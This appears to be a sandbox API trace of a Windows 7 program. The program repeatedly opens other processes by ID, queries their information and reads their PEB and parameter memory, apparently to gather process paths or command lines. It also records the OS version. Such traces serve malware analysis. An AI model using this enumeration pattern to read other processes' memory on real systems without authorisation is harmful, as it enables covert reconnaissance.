[0404.483] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.484] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x72950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.484] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x726fa, lpBuffer=0x12dd100, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.485] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.486] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.486] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.486] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x71ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.487] malloc (_Size=0x7e) returned 0x2c4740
[0404.487] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x72770, lpBuffer=0x2c4740, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.487] free (_Block=0x2c4740)
[0404.488] CloseHandle (hObject=0x240) returned 1
[0404.489] _ui64tow (_Value=0x868, _Buffer="2096", _Radix=10) returned="2152"
[0404.493] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2152") returned 4
[0404.494] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.495] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x868) returned 0x240
[0404.518] GetLastError () returned 0x0
[0404.518] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f26e0, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.520] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.524] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.524] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.524] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.525] malloc (_Size=0x72) returned 0x2c4740
[0404.525] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f274a, lpBuffer=0x2c4740, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.525] free (_Block=0x2c4740)
[0404.526] CloseHandle (hObject=0x240) returned 1
[0404.527] _ui64tow (_Value=0x878, _Buffer="2152", _Radix=10) returned="2168"
[0404.531] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2168") returned 4
[0404.533] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.533] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.556] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x878) returned 0x240
[0404.556] GetLastError () returned 0x0
[0404.556] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.556] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.556] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.557] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x482960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.557] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4826fa, lpBuffer=0x12dd100, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.558] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.559] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.559] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.560] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x481ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.560] malloc (_Size=0x84) returned 0x2c4740
[0404.560] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x482776, lpBuffer=0x2c4740, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.560] free (_Block=0x2c4740)
[0404.561] CloseHandle (hObject=0x240) returned 1
[0404.562] _ui64tow (_Value=0x884, _Buffer="2168", _Radix=10) returned="2180"
[0404.566] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2180") returned 4
[0404.568] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.568] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.590] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x884) returned 0x240
[0404.591] GetLastError () returned 0x0
[0404.591] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x442930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.592] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4426f6, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.593] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.594] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.594] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.594] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x441ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.594] malloc (_Size=0x72) returned 0x2c4740
[0404.595] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x442760, lpBuffer=0x2c4740, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.595] free (_Block=0x2c4740)
[0404.596] CloseHandle (hObject=0x240) returned 1
[0404.596] _ui64tow (_Value=0x554, _Buffer="2180", _Radix=10) returned="1364"
[0404.606] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1364") returned 4
[0404.607] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.607] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.637] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x554) returned 0x240
[0404.637] GetLastError () returned 0x0
[0404.637] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.637] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.637] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.637] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.638] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b26e8, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.639] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.640] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.640] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.640] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.641] malloc (_Size=0x60) returned 0x2c0790
[0404.641] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b2740, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.641] free (_Block=0x2c0790)
[0404.642] CloseHandle (hObject=0x240) returned 1
[0404.643] _ui64tow (_Value=0x6e8, _Buffer="1364", _Radix=10) returned="1768"
[0404.674] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1768") returned 4
[0404.675] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.675] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.706] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e8) returned 0x240
[0404.706] GetLastError () returned 0x0
[0404.706] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.706] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.706] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.707] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1028d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.707] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1026de, lpBuffer=0x12dd100, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.708] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.709] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.709] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.710] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x101ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.710] malloc (_Size=0x5a) returned 0x2c0790
[0404.710] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x102730, lpBuffer=0x2c0790, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.710] free (_Block=0x2c0790)
[0404.711] CloseHandle (hObject=0x240) returned 1
[0404.712] _ui64tow (_Value=0x888, _Buffer="1768", _Radix=10) returned="2184"
[0404.716] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2184") returned 4
[0404.717] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.717] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x888) returned 0x240
[0404.746] GetLastError () returned 0x0
[0404.746] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.746] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.746] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.746] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x352980, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.747] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x352702, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.748] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.749] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.749] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.749] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x351ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.749] malloc (_Size=0x8a) returned 0x2e1b10
[0404.749] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x352784, lpBuffer=0x2e1b10, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1b10*, lpNumberOfBytesRead=0x0) returned 1
[0404.750] free (_Block=0x2e1b10)
[0404.750] CloseHandle (hObject=0x240) returned 1
[0404.751] _ui64tow (_Value=0x644, _Buffer="2184", _Radix=10) returned="1604"
[0404.759] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1604") returned 4
[0404.761] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.761] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.788] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x240
[0404.788] GetLastError () returned 0x0
[0404.788] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.788] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.788] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.788] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x92910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.789] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x926ee, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.790] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.791] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.791] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.791] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x91ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.792] malloc (_Size=0x6c) returned 0x2c4740
[0404.792] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x92752, lpBuffer=0x2c4740, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.792] free (_Block=0x2c4740)
[0404.793] CloseHandle (hObject=0x240) returned 1
[0404.794] _ui64tow (_Value=0x360, _Buffer="1604", _Radix=10) returned="864"
[0404.798] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="864") returned 3
[0404.800] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.800] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.833] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x240
[0404.834] GetLastError () returned 0x0
[0404.834] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.834] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.834] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.834] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x122910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
